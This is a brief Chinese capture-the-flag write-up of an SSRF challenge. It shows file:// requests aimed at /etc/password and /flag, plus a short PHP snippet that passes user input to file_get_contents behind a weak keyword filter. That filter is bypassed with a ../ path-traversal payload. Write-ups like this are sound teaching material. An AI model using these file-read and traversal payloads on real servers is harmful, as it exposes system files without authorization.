题目提示ssrf,所以开始测试
输入:file:///etc/password
返回 :害羞羞,试试其他路径?
可以判断出file协议可以用但是读取不了这个文件,然后盲猜
输入:file:///flag
返回:都说了这里看不了flag。。但是可以看看提示文件:/fl4g
输入:file:///fl4g
返回:你应该看看除了index.php,是不是还有个ha1x1ux1u.php
访问这个文件,代码如下
highlight_file(FILE);
error_reporting(0);
file = _GET["file"];
if (stristr($file, "file")){
die("你败了.");
}
//flag in c
echo file_get_contents($file);
过滤了file协议不过没关系直接:?file=../../../../../../flag
为啥我访问不了ha1x1ux1u.php这个文件